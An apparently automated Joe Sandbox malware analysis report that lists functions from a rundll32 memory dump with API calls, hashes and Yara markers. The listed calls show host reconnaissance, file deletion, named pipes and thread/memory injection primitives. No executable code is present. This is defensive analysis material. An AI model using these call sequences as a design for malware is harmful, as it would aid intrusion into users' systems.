                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                              • String ID:
                              • API String ID: 1209511739-0
                              • Opcode ID: 77385404194e039dbcb27103e1ae2aa5e5522f4898883ec8dc9e611b18b92272
                              • Instruction ID: adf42393f87bf3af521e66a8ed7cdc9168a83ce944dc775b8951462d16456fd5
                              • Opcode Fuzzy Hash: 77385404194e039dbcb27103e1ae2aa5e5522f4898883ec8dc9e611b18b92272
                              • Instruction Fuzzy Hash: 0C414971508306EBC711EF60D94AA2FBBEDFB84B48F040929F485D2150DB35D918CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059516C6 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 059516F0
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05951703
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 05951715
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,05946C8E), ref: 05951739
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 05951747
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0595175E
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 0595176F
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05946C8E), ref: 05951795
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapName$AllocateComputerFreeUser
                              • String ID:
                              • API String ID: 3239747167-0
                              • Opcode ID: d32891ad288cd374d255803cdcafd97e0da8e41ec2a33150790548dddfcc3f15
                              • Instruction ID: ce316eebd30535fb12ac47eace7c22d3a61b00aee4bc57fffbf06b18f098d3c0
                              • Opcode Fuzzy Hash: d32891ad288cd374d255803cdcafd97e0da8e41ec2a33150790548dddfcc3f15
                              • Instruction Fuzzy Hash: 93312BB6A14209EFDB00DFB4DD8586EBBFEFB482507158469E905D3200EB30AE64DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059399BC Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000), ref: 059399D4
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05939A3D
                              • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 05939A65
                              • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 05939AB7
                              • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 05939AC2
                              • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05939AD5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                              • String ID:
                              • API String ID: 499515686-0
                              • Opcode ID: c4d7c25af9d54add9a05c2230255f80e50b491958420680131ecc875a7d01588
                              • Instruction ID: a3379f06319049751ddd30838f23c42a475e7b86818f1d0dbd98aa2ac9ae707f
                              • Opcode Fuzzy Hash: c4d7c25af9d54add9a05c2230255f80e50b491958420680131ecc875a7d01588
                              • Instruction Fuzzy Hash: 5A41477090420AEFDF01EFA4CC8ABAEBFB9FF40304F114565E502A6190DBB49E50DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594EAC5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594EAE7
                                • Part of subcall function 05947950: NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
                                • Part of subcall function 05947950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05947988
                                • Part of subcall function 05947950: SetLastError.KERNEL32(00000000), ref: 0594798F
                              • GetLastError.KERNEL32(?,00000318,00000008), ref: 0594EBF7
                                • Part of subcall function 059336BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 059336D3
                              • memcpy.NTDLL(00000218,059538A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0594EB76
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0594EBD0
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                              • String ID:
                              • API String ID: 2966525677-3916222277
                              • Opcode ID: 3f6695c8d88f4bd077283134e766456daf4072cc2c69786550cc710f9df6b307
                              • Instruction ID: a854fabff5aef96d390e84aa2b0a24b0d503c8a8e9baa21ae73d1e521d6e8eb5
                              • Opcode Fuzzy Hash: 3f6695c8d88f4bd077283134e766456daf4072cc2c69786550cc710f9df6b307
                              • Instruction Fuzzy Hash: 35316F71A01309EFDB20DF65D989EAAB7BDFB04254F10496AE50AD7240EB30AE588F51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594D7F1 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset$memcpy
                              • String ID:
                              • API String ID: 368790112-0
                              • Opcode ID: 6080b7e7d1cf312dc789f62cc6136f002ce1fbda152b01f3f05f92e0fb49b093
                              • Instruction ID: 1a0f40b36e507aa8cf32ed143c852956ab4883586e40f3a1783b57c885d2e012
                              • Opcode Fuzzy Hash: 6080b7e7d1cf312dc789f62cc6136f002ce1fbda152b01f3f05f92e0fb49b093
                              • Instruction Fuzzy Hash: CBF1E034604B9ADFDB31CF68C598AAABBF4FF52300F24496DC5E796681D231AA45CF10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D77A Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0593D7D0
                              • lstrlenW.KERNEL32(?), ref: 0593D7DE
                              • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0593D809
                              • lstrcpyW.KERNEL32(00000006,00000000), ref: 0593D837
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Query$lstrcpylstrlen
                              • String ID:
                              • API String ID: 3961825720-0
                              • Opcode ID: 98fafd8e2d6b69ed8899f43257cf322c11368c77051287423d465cc7227e956d
                              • Instruction ID: 5f1c2a7b01c0d9401433c3af29a780958d7e93c8fd355974f99f6299bfc346a8
                              • Opcode Fuzzy Hash: 98fafd8e2d6b69ed8899f43257cf322c11368c77051287423d465cc7227e956d
                              • Instruction Fuzzy Hash: E9412771604309EFDB11CFA8C986AAEBBBCFF44354F004069F906A7250DB74EA21DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059481F1 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0595A1E8,00000001), ref: 05948215
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948260
                                • Part of subcall function 059473AA: CreateThread.KERNEL32(00000000,00000000,00000000,0594893A,0595A174,05950998), ref: 059473C1
                                • Part of subcall function 059473AA: QueueUserAPC.KERNEL32(0594893A,00000000,?,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473D6
                                • Part of subcall function 059473AA: GetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473E1
                                • Part of subcall function 059473AA: TerminateThread.KERNEL32(00000000,00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473EB
                                • Part of subcall function 059473AA: CloseHandle.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473F2
                                • Part of subcall function 059473AA: SetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473FB
                              • GetLastError.KERNEL32(05941FE9,00000000,00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948248
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05948258
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                              • String ID:
                              • API String ID: 1700061692-0
                              • Opcode ID: b239e9b710a9e907c96aba53c068fdcebd6161d9b952ad61c5b7ded90c811e31
                              • Instruction ID: 253fb4271c6f90b1949b5d655debba2030269381e989a698814e488912fc1a6c
                              • Opcode Fuzzy Hash: b239e9b710a9e907c96aba53c068fdcebd6161d9b952ad61c5b7ded90c811e31
                              • Instruction Fuzzy Hash: 9BF0A4B1309301AFE3115BB89C49E277F6CEB85371B150735F916D2280DB704C259BB4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05931F75 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetVersion.KERNEL32(0595A3E0,05933337,?,?,?,?,?,?,?,05939100,?), ref: 05931F79
                              • GetModuleHandleA.KERNEL32(?,05F3979A,?,?,?,?,?,?,?,05939100,?), ref: 05931F96
                              • GetProcAddress.KERNEL32(00000000), ref: 05931F9D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProcVersion
                              • String ID:
                              • API String ID: 3310240892-0
                              • Opcode ID: c6162fdd706a10a8d8e97fb2208d3232c430b7f45e3f3b202509fb0733708d12
                              • Instruction ID: 271da4366838c7bf88e9701b9afa348beba42a6e8f269a5c910d2a8ea184854a
                              • Opcode Fuzzy Hash: c6162fdd706a10a8d8e97fb2208d3232c430b7f45e3f3b202509fb0733708d12
                              • Instruction Fuzzy Hash: FC1139B4218302DFDB508FA5C94EB11BFE9FB99305B46C1A9E00ACB261EB71D455CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593B7D5 Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0593B7E9
                              • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0593B829
                                • Part of subcall function 05945312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0594907F,?,00000004,00000000,00000004,?), ref: 05945330
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0593B832
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                              • String ID:
                              • API String ID: 4036914670-0
                              • Opcode ID: 7a8b217f8a5cadcbb0ccda69634a089e942c2cff27318b29176a0203c1a39b39
                              • Instruction ID: 97f1c024fd1683bfbee02c85ae282fd0f57301f799e24b37bc634b11ff747e91
                              • Opcode Fuzzy Hash: 7a8b217f8a5cadcbb0ccda69634a089e942c2cff27318b29176a0203c1a39b39
                              • Instruction Fuzzy Hash: DD01FB75A00208FFEB10AAA5EC0ADEEBBBEEB84700F500425F945E2050EB75D914DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05943829 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0594385A
                              • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05943891
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFreeHeapInformationQueryStatusSystem
                              • String ID:
                              • API String ID: 2533303245-0
                              • Opcode ID: 7b5c3746b857cd9d30afeb1bd48dc2e856189f9fa29f2e9770a108abef292152
                              • Instruction ID: 315eda36983cd3758075eb999a513b745331bb2d4978ec50f45dc18c6977f26a
                              • Opcode Fuzzy Hash: 7b5c3746b857cd9d30afeb1bd48dc2e856189f9fa29f2e9770a108abef292152
                              • Instruction Fuzzy Hash: 2601A772906224BBD7259A748C08EAEFA6DEF81B50F120924FD0163300E7789E808AD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059364C4 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 059364E3
                              • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 059364FB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuerymemset
                              • String ID:
                              • API String ID: 2040988606-0
                              • Opcode ID: 179864be10d57348fd76093832b671894363cf743b1d40d7c8829b971d44ec95
                              • Instruction ID: 63fe2adb03d99ffb0d7f5886ca8745d6b7f2032fd7919740919ee4b9c693e5a0
                              • Opcode Fuzzy Hash: 179864be10d57348fd76093832b671894363cf743b1d40d7c8829b971d44ec95
                              • Instruction Fuzzy Hash: 10F0FF76A04228BBEB10DA91DC49FDEBFACEB04740F404061FA08E6191E770EA55CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945220 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                              Download Yara Rule
                              APIs
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0594524D
                              • SetLastError.KERNEL32(00000000,?,0593C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 05945254
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$LastStatus
                              • String ID:
                              • API String ID: 4076355890-0
                              • Opcode ID: bbb6c63b7c9869810444908dfafafba64171ee4c9d4d2daa786e4b145cd45c85
                              • Instruction ID: 8e8e6c215f4a92ebe0383011ad2be639a1601bb86a7833c8f979251d3c644063
                              • Opcode Fuzzy Hash: bbb6c63b7c9869810444908dfafafba64171ee4c9d4d2daa786e4b145cd45c85
                              • Instruction Fuzzy Hash: A2E01A3220421AABDF125EE89C05E9EBF69EB0D781B028011FE15D2121CB31DC319FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594FF4D Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 05950327
                              • memset.NTDLL ref: 05950336
                                • Part of subcall function 05938E0C: memset.NTDLL ref: 05938E1D
                                • Part of subcall function 05938E0C: memset.NTDLL ref: 05938E29
                                • Part of subcall function 05938E0C: memset.NTDLL ref: 05938E54
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                              • Instruction ID: 21be16b273a2ff3c10cd05f0b8bc7c104ea93e8cf0cf38202e851b6a7400c294
                              • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                              • Instruction Fuzzy Hash: 0F021070501B629FC775CF29C698967B7F1BF44720B604E2EDAE786A90E631F891CB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594154D Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                              • Instruction ID: 5181e827ccdf453938f17983b46bc85122dc10d24bc7f381b6e2a68e7ef3cbce
                              • Opcode Fuzzy Hash: d9def6b715dbe5854ad3f939d119ea01d0ab3cc14373ec07a817a0717b2aaf57
                              • Instruction Fuzzy Hash: 7822857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059367CA Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: 50b56c6f7b168128e208852fe3ddd7d4b6c66d7cd50193ba0e3824c2a843ac7a
                              • Instruction ID: 0a842c34911b78b594d7528c385eedfd17245021dee5621862512613d9725027
                              • Opcode Fuzzy Hash: 50b56c6f7b168128e208852fe3ddd7d4b6c66d7cd50193ba0e3824c2a843ac7a
                              • Instruction Fuzzy Hash: A0429A30A08B45DFCB25CF69C481ABABBF6FF49304F54896EC49B9B651D734A486CB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05948E57 Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 05948EC7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateProcessUser
                              • String ID:
                              • API String ID: 2217836671-0
                              • Opcode ID: 2d8fef027ccee4eae6c799f3098ad69cfc0d399f78cfc442aa6f68f7ed2fc7f7
                              • Instruction ID: 515c35dd6f599a9d47525a3146f3cd821bcdc842ddc4118725379e4767644416
                              • Opcode Fuzzy Hash: 2d8fef027ccee4eae6c799f3098ad69cfc0d399f78cfc442aa6f68f7ed2fc7f7
                              • Instruction Fuzzy Hash: A811AF32214249BFDF029E98DD01DEA7FAAFF08265B099215FE1952120C732DC71EF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059336BB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                              Download Yara Rule
                              APIs
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 059336D3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorStatus
                              • String ID:
                              • API String ID: 1596131371-0
                              • Opcode ID: 725f578fe65a26d333c08c6042f844d32c2d9520f04d4483550569ad809dc7bb
                              • Instruction ID: 402b1fa5b6d330d13c3d65751e5a654b61316da4b266bf3e2f2f9839b579ad19
                              • Opcode Fuzzy Hash: 725f578fe65a26d333c08c6042f844d32c2d9520f04d4483550569ad809dc7bb
                              • Instruction Fuzzy Hash: 70C01236509302EFDF095B50D81A92ABE55BB50380F004818B54A80060CA319460C700
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05953DB0 Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                              • Instruction ID: 87123129e8aa6c97fd31639c5f7d0da74f17343c3b00844d7ca8181d40e46a5f
                              • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                              • Instruction Fuzzy Hash: A521B872904204ABDB11DF68CCC4967B7E9FF44360B05C969ED169B245D730F929C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059337C2 Relevance: 54.4, APIs: 36, Instructions: 424synchronizationtimethreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05945C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 05945C5C
                                • Part of subcall function 05945C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05945D1D
                                • Part of subcall function 05945C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 05945D26
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 05933860
                                • Part of subcall function 0593A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0593A990
                                • Part of subcall function 0593A976: CreateWaitableTimerA.KERNEL32(0595A1E8,00000001,?), ref: 0593A9AD
                                • Part of subcall function 0593A976: GetLastError.KERNEL32(?,00000000,05948C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0593A9BE
                                • Part of subcall function 0593A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593A9FE
                                • Part of subcall function 0593A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA1D
                                • Part of subcall function 0593A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05948C06,00000000,00000000,0000801C), ref: 0593AA33
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 059338C3
                              • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 0593393F
                              • StrTrimA.SHLWAPI(00000000,?), ref: 05933961
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 059339A1
                                • Part of subcall function 0593F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 0593F0B0
                                • Part of subcall function 0593F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,05933899,?), ref: 0593F0DE
                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 05933A47
                              • CloseHandle.KERNEL32(?), ref: 05933CD6
                                • Part of subcall function 0593E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,05933A69,?), ref: 0593E2F2
                                • Part of subcall function 0593E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05933A69,?), ref: 0593E320
                                • Part of subcall function 0593E2E6: ResetEvent.KERNEL32(?,?,?,?,?,05933A69,?), ref: 0593E33A
                              • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 05933A7C
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933A8B
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933AB8
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933AD2
                              • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 05933B1A
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 05933B34
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05933B4A
                              • ReleaseMutex.KERNEL32(?), ref: 05933B67
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933B78
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933B87
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933BBB
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933BD5
                              • SwitchToThread.KERNEL32 ref: 05933BD7
                              • ReleaseMutex.KERNEL32(?), ref: 05933BE1
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933C1F
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933C2A
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05933C4D
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05933C67
                              • SwitchToThread.KERNEL32 ref: 05933C69
                              • ReleaseMutex.KERNEL32(?), ref: 05933C73
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 05933C88
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933CEA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933CF6
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D02
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D0E
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D1A
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D26
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05933D32
                              • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05933D41
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                              • String ID:
                              • API String ID: 2369282788-0
                              • Opcode ID: aa2be75967bfc6cf7de62e4cd5cb9ed6716091694021f920bc081fe01f8eccfc
                              • Instruction ID: 8d65e68b8953aabac95dc954faea2e306b1d198e276a70dc5a9d3f232bf3f153
                              • Opcode Fuzzy Hash: aa2be75967bfc6cf7de62e4cd5cb9ed6716091694021f920bc081fe01f8eccfc
                              • Instruction Fuzzy Hash: 52E18971518305EFDB10AF68DD86D2AFBEDFB84264F054A29F995921A0EB30DC14CB22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594F1C4 Relevance: 43.8, APIs: 29, Instructions: 271memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL ref: 0594F1E5
                              • GetTickCount.KERNEL32 ref: 0594F1FF
                              • wsprintfA.USER32 ref: 0594F252
                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0594F25E
